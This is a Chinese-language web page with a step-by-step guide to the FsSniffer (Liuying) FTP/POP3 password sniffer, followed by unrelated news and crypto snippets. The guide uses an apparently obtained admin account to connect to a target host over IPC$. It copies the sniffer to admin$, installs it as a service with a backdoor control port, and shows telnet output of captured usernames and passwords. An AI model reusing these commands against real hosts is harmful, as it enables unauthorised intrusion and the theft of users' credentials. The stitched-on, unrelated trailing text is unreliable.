流影 POP3/FTP Sniffer 说明
本地使用指南
启动FsSniffer工具的标准命令格式为:FSSNIFFER -S 。下面详细解析每个参数的具体含义:
免费影视、动漫、音乐、游戏、小说资源长期稳定更新! 👉 点此立即查看 👈
Bind IP:指需要绑定的IP地址,通常设置为本地主机的IP地址,用于监听网络数据。
Port:此参数用于指定控制端口,后续需要通过此端口登录管理界面,查看捕获到的网络数据包结果。
Control Password:登录控制台时所需的身份验证密码,用于保障管理安全。
成功登录FsSniffer管理控制台后,需要掌握几个核心操作命令:使用Show Result命令可以查看所有捕获到的网络记录;输入Quit命令可直接退出当前控制台会话;而执行ShutDown命令则会彻底终止FsSniffer的监控进程。
远程部署与应用
远程部署FsSniffer的步骤相对复杂,但逻辑清晰。我们通过一个典型实例进行说明:假设已获取目标主机211.152.188.1的一个管理员组账号test,密码为test。
第一步,建立远程连接。 使用Windows系统自带的net use命令建立IPC$连接:
D:\>net use \\211.152.188.1\ipc$ test /user:test
The command completed successfully.连接建立成功后,第二步是上传FsSniffer工具。 将本地的FsSniffer.exe文件直接复制到远程主机的系统目录(也可借助流光IV等安全工具中的“种植者”功能完成上传):
D:\>copy “d:\My Documents\ShadowSniffer\Release\FsSniffer.exe” \\211.152.188.1\admin$
1 file(s) copied.第三步,安装并启动服务。 利用流光IV内置的NTCMD工具远程执行FsSniffer.exe,将其安装为系统服务。具体操作与系统回显如下:
=============Windows NT/2000 NTCmd Ver 0.1 for Fluxay IV============
Written by Assassin, https://www.netXeyes.com https://www.netXeyes.org
NTCMD>ver
Microsoft Windows 2000 [Version 5.00.2195]
NTCMD>fssniffer.exe -I test test ShadowSniffer 211.152.188.1 7 123456
Flux Shadow Sniffer(FTP/POP3) Edition, Written by Assassin 2001
TestSniffer1 installed.
NTCMD>至此,远程主机上已成功安装了一个名为“ShadowSniffer”的系统服务。接下来,使用net命令启动该服务:
NTCMD>net start shadowsniffer
The ShadowSniffer service is starting..
The ShadowSniffer service was started successfully.这里需要详细说明安装服务时的命令格式:FsSniffer -I 。
各参数定义如下:UserName与Password指远程主机上具备管理员权限的账号和密码;Service Name是用户自定义的服务名称,若安装失败,可尝试将FsSniffer.exe文件改名后重新执行;Bind Local IP是远程主机的监听IP地址,对于多网卡主机,需根据监听目标(如内网或外网流量)选择正确的地址;Port是后门控制端口号;Control Password则是远程连接时使用的控制密码。
服务启动并运行一段时间后,即可通过Telnet连接查看捕获结果。连接远程主机的指定端口(本例为端口7),并输入控制密码:
D:>telnet 211.152.188.1 7
Control Password: **************
===============Banyet Soft Labs. 1995-2001 All Rights Reserved.========================
Written by Assassin, Server Edition FluxShadow@21cn.com==================
FluxShadow Remote FTP/POP3 Sniffer Beta 1, Pleased to See You Again!======
Flux Shadow Sniffer>show result
===========Flux Shadow Sniffer Edition Results===========
211.152.188.112(1106)->211.152.188.1(8213) USER zjf
211.152.188.112(1106)->211.152.188.1(8213) PASS 1qaz4rfv
211.152.188.1(8213)->211.152.188.112(1106) User zjf logged in.
211.152.188.1(8199)->211.152.188.112(1107) USER zjf
211.152.188.1(8199)->211.152.188.112(1107) PASS 1qaz4rfv
Total 10 Sniffered
======================================================
小榕软件实验室™ 1995-2001版权所有
www.netXeyes.com www.netXeyes.org
dansnow@21cn.com相关攻略
本地使用指南 启动FsSniffer工具的标准命令格式为:FSSNIFFER -S 。下面详细解析每个参数的具体含义: Bind IP:指需要绑定的IP地址,通常设置为本地主机的IP地址,用于监听网络数据。 Port:此参数用于指定控制端口,后续需要通过此端口登录管理界面,查看捕获到的网络数据包结果
比特币短期持有者数量下降说明什么?比特币短期持有者数量下降表明需求减弱,市场可能趋于稳定,短期持有者通常在市场波动较大时进行频繁交易,因此他们的行为对市场情绪和价格波动有较大影响,下文是比特币短期持有者数量下降的原因分析
IT之家 12 月 22 日消息,B站最新账号 @哔哩哔哩社区小管家 今日发布《哔哩哔哩关于萝卜陈震同学账号封禁的说明》。《说明》称,依法纳税是每个纳税人应尽的责任和义务,哔哩哔哩切实履行主体责任,
新浪科技讯 12月8日晚间消息,今日晚间,影石创始人刘靖康发布内部信。针对近日影翎无人机新品遇冷的消息,刘靖康在内部信中回应称:“影翎仅中国区48小时就卖了3000多万元,且多个海外市场目前正在进行
新浪科技讯 12月8日晚间消息,今日晚间,影石创始人刘靖康发布内部信。针对近日影翎无人机新品遇冷的消息,刘靖康在内部信中回应称:“影翎仅中国区48小时就卖了3000多万元,且多个海外市场目前正在进行
热门专题
热门推荐
以太坊的第一个公开版本被称为“Frontier”,它标志着这个去中心化应用平台的正式诞生。本文将详细介绍这个最初版本的以太坊,及其在整个发展历程中的重要意义。 一、创世之初:Frontier的诞生 说起以太坊的起点,绕不开它的第一个正式公开版本——Frontier。这个版本于2015年7月30日正式
《乘风破浪的姐姐2026》开播引爆话题:舞台争议与个人魅力交织,看点十足 备受期待的《乘风破浪的姐姐2026》全新一季正式开播,迅速霸占各大社交平台热搜榜。节目中,各位姐姐纷纷展现各自的舞台实力与个人特色,部分表演虽被观众认为“尚有提升空间”,甚至偶有发挥失常的场面,但随着赛程深入,多位姐姐凭借鲜明
对于全球数字资产交易者来说,欧易OKX(OKX)是一个耳熟能详的名字。它提供从现货、合约到理财、NFT与Web3的一站式服务。不过,网络环境复杂,找到正确的官网入口是保障安全的第一步。本文将为你提供其国际官网的最新访问链接,帮助你安全、便捷地登录与浏览。 OKX 国际官网入口 要访问OKX的国际版官
《女神异闻录》周边副标题取消 再引重制版游戏猜测 几周前,Atlus推广《女神异闻录》系列周边的方式,就已在玩家社区里激起了不小的水花。而今天发生的一件小事,则让这个话题再度升温,确实值得仔细琢磨一番。 事情的起因,是一批纪念系列初代作品的T恤正式开售。这里说的“初代作品”,指的是《女神异闻录3》问
理解whenever的基本功能在Ruby编程领域,whenever是一个广为人知的Ruby Gem,它的核心作用是将Ruby代码编写的周期性任务,转换为操作系统的crontab格式。这使得开发者能够使用更熟悉、更灵活的Ruby语法来定义和管理需要定时执行的任务,例如数据备份、报告生成、缓存清理或AP